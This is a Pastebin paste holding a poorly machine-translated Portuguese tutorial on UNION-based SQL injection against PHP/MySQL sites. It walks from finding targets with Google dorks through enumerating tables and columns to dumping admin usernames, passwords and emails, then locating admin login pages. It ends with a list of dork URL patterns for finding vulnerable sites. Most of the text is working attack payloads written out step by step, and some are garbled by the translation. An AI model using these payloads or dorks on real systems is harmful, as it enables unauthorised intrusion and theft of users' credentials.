API tools faq
paste
Advertisement
Guest User

Tutorial de SQLi

a guest
Mar 14th, 2016
1,031
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.30 KB | None | 0 0
raw download clone embed print report
  1. Aqui você vai encontrar um relatório muito detalhado, passo a passo tutorial escrito por mim (PhortyPhour) na injeção SQL. Isto é puramente para fins educacionais e é para ser usado a critério do leitor.
  2.  
  3. Primeiro temos que saber o que a injeção de SQL é exatamente.
  4.  
  5. injeção de SQL é uma técnica de injeção de código que explora uma vulnerabilidade de segurança que ocorrem na camada de banco de dados de uma aplicação. A vulnerabilidade está presente quando a entrada do usuário ou é filtrada incorretamente para cordas caracteres de escape literais incorporados em instruções SQL ou a entrada do usuário não é fortemente tipado e, assim, inesperadamente executado. É uma instância de uma classe mais geral de vulnerabilidades que podem ocorrer sempre que uma programação ou linguagem de script é incorporado dentro de outro. ataques de injeção SQL são também conhecidos como ataques de inserção SQL.
  6.  
  7. Esse é o primeiro parágrafo da página da Wikipedia para SQLi (injeção de SQL) encontrada aqui:
  8. http://en.wikipedia.org/wiki/SQL_injection
  9.  
  10. Aconselho a leitura da página inteira.
  11.  
  12. O que é coberto neste tutorial?
  13.  
  14. Part One - Avaliação Site
  15. Seção Um - Encontrar um website vulneráveis
  16. Seção Dois - Determinar a quantidade de colunas
  17. Seção Três - Finding quais colunas são vulneráveis
  18.  
  19. Part Two - recolhendo informações
  20. Seção Um - Determinar a versão SQL
  21. Seção Dois - Encontrar o banco de dados
  22.  
  23. Parte III - The Good Stuff
  24. Seção Um - Encontrar os nomes de tabela
  25. Seção Dois - Encontrar os nomes de coluna
  26. Seção Três - Exibindo o conteúdo da coluna
  27. Seção Quatro - Encontrar a página de administração
  28.  
  29. Agora vamos começar.
  30.  
  31. Part One - Avaliação Site
  32.  
  33. A fim de começarmos a explorar um site é preciso primeiro saber exatamente o que estamos injetando. Isto é o que vamos fazer a cobertura na primeira parte, juntamente com a forma de avaliar as informações que recolhemos.
  34.  
  35. Seção Um - Encontrar um website vulneráveis
  36.  
  37. sites vulneráveis ​​podem ser encontrados usando dorks (I incluirá uma lista no final deste tutorial), quer no Google ou com um scanner de explorar. Para aqueles de vocês que não estão familiarizados com o termo "dorks", vou tentar explicar.
  38.  
  39. Dorks são URLs de sites que são conhecidos por serem vulneráveis. Na injeção SQL estas dorks parecido com este:
  40.  
  41. Código:
  42. inurl:? buy.php id =
  43.  
  44. Isso vai ser introduzido num motor de busca e por causa da "inurl:" parte do dork, o motor de busca irá retornar resultados com URLs que contêm os mesmos personagens. Alguns dos locais que têm este idiota em seu site pode ser vulnerável a injeção de SQL.
  45.  
  46. Agora vamos dizer que encontramos a página:
  47.  
  48. Código:
  49. http://www.site.com/buy.php?id=1
  50.  
  51. A fim de testar este site tudo o que precisamos fazer é adicionar um "quer entre o sinal" = "eo" 1 "ou após o" 1 "para que ele se parece com isso:
  52.  
  53. Código:
  54. http://www.site.com/buy.php?id=1 '
  55. ou
  56. http://www.site.com/buy.php?id='1
  57.  
  58. Depois de pressionar enter, se este site devolve um erro, como o seguinte:
  59.  
  60. Código:
  61. Warning: mysql_fetch_array (): o argumento fornecido não é um recurso de resultado MySQL válido no /home1/michafj0/public_html/gallery.php na linha 7
  62.  
  63. Ou algo nesse sentido, isso significa que é vulnerável a injeção.
  64.  
  65. No caso onde você está para encontrar um site como este:
  66.  
  67. Código:
  68. http://www.site.com/buy.php?id=1&dog;catid=2
  69.  
  70. Em seguida, você deve usar a mesma técnica com a adição de um "exceto que ele deve estar entre o valor (neste caso, o número) e do operador (o sinal" = ") para que ele se parece com isso:
  71.  
  72. Código:
  73. http://www.site.com/buy.php?id='1&dog;catid='2
  74.  
  75. Existem programas que vão fazer isso para você, mas para começar eu gostaria de sugerir simplesmente para fazer as coisas manualmente, usando o Google, e por isso não vou postar qualquer para vocês. Se você se sente tão obrigado a usar um de qualquer maneira. Eu recomendo o Scanner Exploit por Reiluke.
  76.  
  77. Seção Dois - Determinar a quantidade de colunas
  78.  
  79. A fim de sermos capazes de usar comandos e obter resultados, devemos saber quantas colunas existem em um site. Então, para encontrar o número de colunas, devemos usar um método muito complexo e avançado que eu gosto de chamar de "tentativa e erro" com o comando ORDER BY Biggrin
  80.  
  81. NOTA: O SQL não importa se ou não suas cartas são capitalizados ou não e eu estou apenas fazendo isso por clareza, por tudo o que importa suas consultas poderia ser assim:
  82.  
  83. Código:
  84. http://www.site.com/buy.php?id=-1 PODE I HAZ Teh senhas? PLZ aNd ThX
  85.  
  86. NÃO IMPORTA (btw por favor, não acho que foi um comando real).
  87.  
  88. Então, de volta ao comando ORDER BY. Para encontrar o número de colunas que escrever uma consulta com incrementar valores até que teremos um erro, como este:
  89.  
  90. Código:
  91. http://www.site.com/buy.php?id=1 ORDER BY 1-- <--- Nenhum erro
  92. http://www.site.com/buy.php?id=1 ORDER BY 2-- <--- Nenhum erro
  93. http://www.site.com/buy.php?id=1 ORDER BY 3-- <--- Nenhum erro
  94. http://www.site.com/buy.php?id=1 ORDER BY 4-- <--- Nenhum erro
  95. http://www.site.com/buy.php?id=1 ORDER BY 5-- <--- ERRO!
  96.  
  97. Isto significa que existem quatro colunas!
  98.  
  99. NÃO esqueça de incluir o NULL duplo (-) depois que a consulta.
  100. MUITO IMPORTANTE!
  101.  
  102. Seção Três - Finding quais colunas são vulneráveis
  103.  
  104. Então, nós sabemos que existem quatro colunas agora temos que descobrir quais são vulneráveis ​​a injeção. Para fazer isso usamos a UNIÃO e SELECT consultas, mantendo o nulo duplo (-) no final da cadeia. Há também uma outra diferença que é pequeno em tamanho, mas não em importância, veja se você pode manchá-lo.
  105.  
  106. Código:
  107. http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--
  108.  
  109. Se você não podia detectar a diferença, é o nulo extra entre o sinal "=" eo valor (o número).
  110.  
  111. buy.php? id = -1
  112.  
  113. Agora, depois de introduzir essa consulta você deve ser capaz de ver alguns números em algum lugar na página que parece fora do lugar. Esses são os números das colunas que são vulneráveis ​​a injeção. Podemos usar essas colunas para extrair informações do banco de dados que veremos na segunda parte.
  114.  
  115. Part Two - recolhendo informações
  116.  
  117. Nesta parte, vamos descobrir como encontrar o nome do banco de dados e qual a versão do SQL do site está usando usando consultas para explorar o site.
  118.  
  119. Seção Um - Determinar a versão SQL.
  120.  
  121. Encontrar a versão do SQL do site é um passo muito importante, porque os passos a tomar para a versão 4 são bastante diferentes da versão 5, a fim de obter o que deseja. Neste tutorial, eu não vou estar cobrindo a versão 4 porque é realmente um jogo de adivinhação e para o tipo de sites que ainda estão a usá-lo, não vale a pena o seu tempo.
  122.  
  123. Se olharmos para trás para o fim da Seção Três na primeira parte, vimos como encontrar as colunas vulneráveis. Com essa informação, podemos montar a nossa próxima consulta (eu vou estar usando coluna 2). O comando deve ficar assim:
  124.  
  125. Código:
  126. http://www.site.com/buy.php?id=-1 UNION SELECT 1, @@ version, 3,4--
  127.  
  128. Porque 2 é a coluna vulneráveis, isto é onde vamos colocar "@@ version". Outra seqüência que poderia substituir "@@ version" é "version ()".
  129.  
  130. Se o site ainda não exibe a versão tente usar unhex (hex ()), que se parece com isso:
  131.  
  132. Código:
  133. http://www.site.com/buy.php?id=-1 UNION SELECT 1, unhex (hex (@@ version)), 3,4--
  134.  
  135. NOTA: Se este método deve ser utilizado aqui, ela deve ser utilizada para o resto da injecção, bem.
  136.  
  137. Agora o que você quer ver é algo ao longo destas linhas:
  138.  
  139. Código:
  140. 5.1.47-community-log
  141.  
  142. Que é a versão do SQL para o site.
  143.  
  144. NOTA: Se você ver a versão 4 e você gostaria de ter um ir para lá, há outros tutoriais que explicam como injectar-lo.
  145.  
  146. Seção Dois - Encontrar o banco de dados
  147.  
  148. Encontrar o nome do banco de dados nem sempre é um passo necessário para levar para reunir as informações que deseja, no entanto, na minha experiência folllowing estes passos e encontrar o banco de dados pode, por vezes, levar a uma maior taxa de sucesso.
  149.  
  150. Para encontrar o banco de dados que usa uma consulta como a mostrada abaixo:
  151.  
  152. Código:
  153. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (schema_name), 3,4 a partir information_schema.schemata--
  154.  
  155. Isso às vezes pode retornar mais resultados do que o necessário e por isso que é quando passar a esta consulta em vez disso:
  156.  
  157. Código:
  158. http://www.site.com/buy.php?id=-1 UNION SELECT 1, concat (banco de dados ()), 3,4--
  159.  
  160. Parabéns! Você agora tem o nome do banco de dados! Copiar e colar o nome em algum lugar seguro, nós vamos precisar dele para mais tarde.
  161.  
  162. Parte III - The Good Stuff
  163.  
  164. Esta é a parte divertida, onde vamos encontrar os nomes de usuário, e-mails e senhas!
  165.  
  166. Seção Um - Encontrar os nomes de tabela
  167.  
  168. Para encontrar os nomes de tabela que usamos uma consulta que é semelhante ao utilizado para encontrar o banco de dados com um pouco extra adicionado em:
  169.  
  170. Código:
  171. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (table_name), 3,4 de information_schema.tables ONDE table_schema = banco de dados () -
  172.  
  173. Pode parecer longo e confuso, mas uma vez que você compreendê-lo, ele realmente não é assim que eu vou tentar explicar. O que esta consulta faz é que "grupos" (GROUP_CONCAT) os "nomes de tabela" (table_name) juntos e reúne as informações "de" (DE) information_schema.tables onde o "esquema de tabela" (table_schema) podem ser encontrados no "banco de dados "(base de dados ()).
  174.  
  175. NOTA: Enquanto estiver usando group_concat você só será capaz de ver 1024 caracteres no valor de mesas por isso, se você perceber que uma mesa é cortado na extremidade passar a limitar que vou explicar agora.
  176.  
  177. Código:
  178. http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 de information_schema.tables ONDE table_schema = banco de dados () LIMIT 0,1--
  179.  
  180. O que isto significa é que mostra a primeira e única da primeira tabela. Então, se nós estávamos a correr para fora de caracteres em digamos que a tabela 31 podemos usar esta consulta:
  181.  
  182. Código:
  183. http://www.site.com/buy.php?id=-1 UNION SELECT 1, table_name, 3,4 de information_schema.tables ONDE table_schema = banco de dados () LIMIT 30,1--
  184.  
  185. Observe como o meu limite era de 30,1, em vez de 31,1? Isto é porque quando se utiliza limite é iniciado a partir de 0,1 o que significa que o 30 é, na verdade, a língua 31
  186.  
  187. Você tem agora todos os nomes de tabela!
  188.  
  189.  
  190. Seção Dois - Encontrar os nomes de coluna
  191.  
  192. Agora que você tem todos os nomes de tabela e tentar escolher o que você acha que deve conter a informação suculenta. Normalmente eles são tabelas como usuário (s), Administração (s), tblUser (s) e assim por diante, mas isso varia entre sites.
  193.  
  194. Depois de decidir qual tabela você acha que contém as informações, use esta consulta (no meu exemplo, eu estarei usando o nome da tabela "Admin"):
  195.  
  196. Código:
  197. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 de INFORMATION_SCHEMA.COLUMNS onde table_name = "Admin" -
  198.  
  199. Isto quer dar-lhe uma lista de todas as colunas dentro da tabela ou dar-lhe um erro, mas não entre em pânico se é resultado # 2! Tudo isto significa é que Magic Quotes é ligado. Isto pode ser contornado usando um hex ou conversor char (ambos trabalham) para converter o texto normal em char ou hex (um link para um site que faz isso será incluído no final do tutorial).
  200.  
  201. UPDATE: Se você receber um erro neste momento tudo o que você deve fazer é seguir estes passos:
  202.  
  203. 1. Copie o nome da tabela que você está tentando acessar.
  204. 2. Cole o nome da tabela para este site onde diz "Diga Olá a meu amigo pequeno".
  205. Hex / Char Converter
  206. http://www.swingnote.com/tools/texttohex.php
  207. 3. Clique em Converter.
  208. 4. Copie a sequência de números / letras sob Hex em sua consulta para que ele se parece com isso:
  209.  
  210. Código:
  211. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (column_name), 3,4 de INFORMATION_SCHEMA.COLUMNS onde table_name = 0x41646d696e--
  212.  
  213. Observe como antes de eu colei o hex eu adicionei um "0x", tudo isso faz é informa ao servidor que os seguintes personagens são parte de uma cadeia hexadecimal.
  214.  
  215. Agora você deve ver uma lista de todas as colunas dentro da tabela, como nome de usuário, senha e e-mail.
  216.  
  217. NOTA: Usando a função de limite funciona com colunas também.
  218.  
  219. Seção Três - Exibindo o conteúdo da coluna
  220.  
  221. Estamos quase terminando! Tudo o que temos a fazer é ver o que está dentro dessas colunas e usar as informações para acessar! Para ver as colunas que precisamos para decidir quais as que quer ver e, em seguida, usar essa consulta (neste exemplo, eu quero ver o colunas "username", "password" e "email", e meu nome de banco de dados será "db123 "). Este é o lugar onde o nome do banco vem a calhar:
  222.  
  223. Código:
  224. http://www.site.com/buy.php?id=-1 UNION SELECT 1, group_concat (username, 0x3a, password, 0x3a, email), 3,4 DE db123.Admin--
  225.  
  226. Nesta consulta, 0x3a é o valor hexadecimal de dois pontos (:), que irá agrupar o usuário: senha: e-mail para os usuários individuais apenas como aquele.
  227.  
  228. FINALMENTE! Agora você tem as informações de login para os usuários do site, incluindo o administrador. Tudo que você tem a fazer agora é encontrar a página de login do administrador que nos traz a Seção Quatro.
  229.  
  230. Seção Quatro - Encontrar a página de administração
  231.  
  232. Normalmente, a página de administração será diretamente fora da home page do site, aqui estão alguns exemplos:
  233.  
  234. Código:
  235. http://www.site.com/admin
  236. http://www.site.com/adminlogin
  237. http://www.site.com/modlogin
  238. http://www.site.com/moderator
  239.  
  240. Mais uma vez, existem programas que vão encontrar a página para você, mas primeiro tente algumas das suposições básicas, que poderia poupar-lhe um par de cliques. Se você usar um programa Reiluke foi codificado um para isso também. Pesquisar Administrador Finder Reiluke.
  241.  
  242. E que conlcudes meu tutorial! Espero que tenha sido útil para alguns de vocês. Lembre-se de manter praticando e, eventualmente, você vai ter todas as consultas memorizadas em nenhum momento!
  243.  
  244. Comentar e avaliar!
  245.  
  246. Dê o crédito onde o crédito é devido!
  247.  
  248. Eu mantenho minhas promessas então aqui é o que eu disse que eu iria incluir:
  249.  
  250. Dork List
  251. trainers.php?id=
  252. article.php?ID=
  253. play_old.php?id=
  254. declaration_more.php?decl_id=
  255. Pageid=
  256. games.php?id=
  257. newsDetail.php?id=
  258. staff_id=
  259. historialeer.php?num=
  260. product-item.php?id=
  261. news_view.php?id=
  262. humor.php?id=
  263. communique_detail.php?id=
  264. sem.php3?id=
  265. opinions.php?id=
  266. spr.php?id=
  267. pages.php?id=
  268. chappies.php?id=
  269. prod_detail.php?id=
  270. viewphoto.php?id=
  271. view.php?id=
  272. website.php?id=
  273. hosting_info.php?id=
  274. gery.php?id=
  275. detail.php?ID=
  276. publications.php?id=
  277. Productinfo.php?id=
  278. releases.php?id=
  279. ray.php?id=
  280. produit.php?id=
  281. pop.php?id=
  282. shopping.php?id=
  283. productdetail.php?id=
  284. post.php?id=
  285. section.php?id=
  286. theme.php?id=
  287. page.php?id=
  288. shredder-categories.php?id=
  289. product_ranges_view.php?ID=
  290. shop_category.php?id=
  291. channel_id=
  292. newsid=
  293. news_display.php?getid=
  294. ages.php?id=
  295. clanek.php4?id=
  296. review.php?id=
  297. iniziativa.php?in=
  298. curriculum.php?id=
  299. labels.php?id=
  300. look.php?ID=
  301. galeri_info.php?l=
  302. tekst.php?idt=
  303. newscat.php?id=
  304. newsticker_info.php?idn=
  305. rubrika.php?idr=
  306. offer.php?idf=
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!